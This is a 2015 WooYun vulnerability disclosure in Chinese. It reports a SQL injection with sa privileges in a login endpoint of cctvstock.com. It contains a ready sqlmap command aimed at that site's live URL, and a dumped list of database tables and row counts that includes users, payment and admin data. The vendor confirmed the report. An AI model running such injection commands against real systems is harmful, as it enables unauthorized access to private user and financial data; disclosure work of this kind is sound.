当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163554

漏洞标题:cctv证券资讯服务中心SQL注入

相关厂商:中国网络电视台

漏洞作者: hecate

提交时间:2015-12-22 17:01

修复时间:2016-02-07 17:56

公开时间:2016-02-07 17:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-22: 细节已通知厂商并且等待厂商处理中
2015-12-25: 厂商已经确认,细节仅向厂商公开
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2016-02-07: 细节向公众公开

简要描述:

sa权限

详细说明:

target: http://www.cctvstock.com/

sqlmap -u "http://club.cctvstock.com/tools/json/LoginPlus.aspx?action=login&callback=jsonp1450765749548&u=admin&p=admin"


11.png

漏洞证明:

Database: new_club
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| dbo.PE_Log | 72134 |
| dbo.CCTV_SP_Post_Draft | 19078 |
| dbo.PE_Users | 18824 |
| dbo.CCTV_SP_Post_Comment | 15396 |
| dbo.CCTV_SP_Sms_Record | 10490 |
| dbo.PE_Contacter | 10334 |
| dbo.CCTV_SP_Event_BaoMing | 7623 |
| dbo.CCTV_SP_Vod | 6518 |
| dbo.[VIEW_CCTV_SP_Member_Wrong!!] | 6152 |
| dbo.[VIEW_CCTV_SP_Member_Wrong!!] | 6152 |
| dbo.PE_Files | 4721 |
| dbo.View_CCTV_SP_Caifu_Report | 4607 |
| dbo.CCTV_SP_Live | 4242 |
| dbo.PE_U_UserText | 3661 |
| dbo.PE_Region | 2917 |
| dbo.PE_CommonModel | 1301 |
| dbo.PE_U_Article | 1161 |
| dbo.PE_ContentPermission | 1054 |
| dbo.PE_Role_Node_Permissions | 1017 |
| dbo.PE_InfoFileRelation | 988 |
| dbo.CCTV_SP_Product_Record | 965 |
| dbo.PE_StatDay | 808 |
| dbo.CCTV_SP_Member_Class | 553 |
| dbo.CCTV_SP_Member_Class | 553 |
| dbo.View_CCTV_SP_Class_Member | 553 |
| dbo.View_CCTV_SP_Class_Live | 534 |
| dbo.View_CCTV_SP_Class_Live | 534 |
| dbo.PE_ContentCharge | 326 |
| dbo.PE_PointLog | 303 |
| dbo.CCTV_SP_Post_Attachment | 162 |
| dbo.CCTV_SP_Post_Attachment | 162 |
| dbo.PE_GroupNodePermissions | 161 |
| dbo.CCTV_SP_Info | 104 |
| dbo.PE_Nodes_Model_Template | 96 |
| dbo.PE_Nodes_Model_Template | 96 |
| dbo.PE_GroupFieldPermissions | 92 |
| dbo.PE_U_New_Front_Img | 58 |
| dbo.CCTV_SP_Class | 47 |
| dbo.PE_U_GuestBook | 45 |
| dbo.PE_Advertisement | 41 |
| dbo.PE_AdZone | 38 |
| dbo.PE_StatMonth | 38 |
| dbo.PE_Zone_Advertisement | 38 |
| dbo.CCTV_SP_Announce | 37 |
| dbo.PE_SurveyRecord1 | 34 |
| dbo.PE_Roles_Permissions | 33 |
| dbo.PE_Roles_Permissions | 33 |
| dbo.PE_PaymentLog0 | 32 |
| dbo.PE_PaymentLog0 | 32 |
| dbo.PE_Dictionary | 25 |
| dbo.PE_Model | 25 |
| dbo.PE_KeywordRelationShip | 17 |
| dbo.PE_IncludeFile | 16 |
| dbo.PE_Admin_Roles | 12 |
| dbo.PE_Admin_Roles | 12 |
| dbo.PE_AdminProfile | 12 |
| dbo.PE_Keywords | 11 |
| dbo.PE_ModelTemplates | 11 |
| dbo.PE_PayPlatForm | 11 |
| dbo.PE_ProcessStatusCode | 11 |
| dbo.PE_Status | 10 |
| dbo.PE_BankrollItem0 | 9 |
| dbo.PE_BankrollItem0 | 9 |
| dbo.PE_UserGroups | 8 |
| dbo.CCTV_SP_DianBo | 7 |
| dbo.PE_PaymentType | 7 |
| dbo.PE_StatYear | 7 |
| dbo.PE_U_Report_Img | 7 |
| dbo.PE_DeliverType | 6 |
| dbo.PE_Courier | 5 |
| dbo.PE_U_Front_Img | 5 |
| dbo.PE_Role_Special_Permissions | 4 |
| dbo.PE_U_SP_Event_Img | 4 |
| dbo.PE_U_SP_Event_Img | 4 |
| dbo.PE_FlowProcess | 3 |
| dbo.PE_InfoNextProcessRoles | 3 |
| dbo.PE_Process_Roles | 3 |
| dbo.PE_SpecialCategory | 3 |
| dbo.PE_SurveyVote | 3 |
| dbo.CCTV_SP_Recommend | 2 |
| dbo.CCTV_SP_Talk | 2 |
| dbo.PE_StatWeek | 2 |
| dbo.CCTV_SP_Bbs_Attachment | 1 |
| dbo.CCTV_SP_Bbs_Attachment | 1 |
| dbo.CCTV_SP_Consult | 1 |
| dbo.PE_GroupSpecialPermissions | 1 |
| dbo.PE_StatInfoList | 1 |
| dbo.PE_StatVisitor | 1 |
| dbo.PE_StatVisitor | 1 |
| dbo.PE_Survey | 1 |
| dbo.PE_U_FriendSite | 1 |
| dbo.PE_ValidLog | 1 |
| dbo.PE_Version | 1 |
| dbo.PE_WorkFlows | 1 |
+-----------------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 hecate@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-25 18:00

厂商回复:

非常感谢。

最新状态:

暂无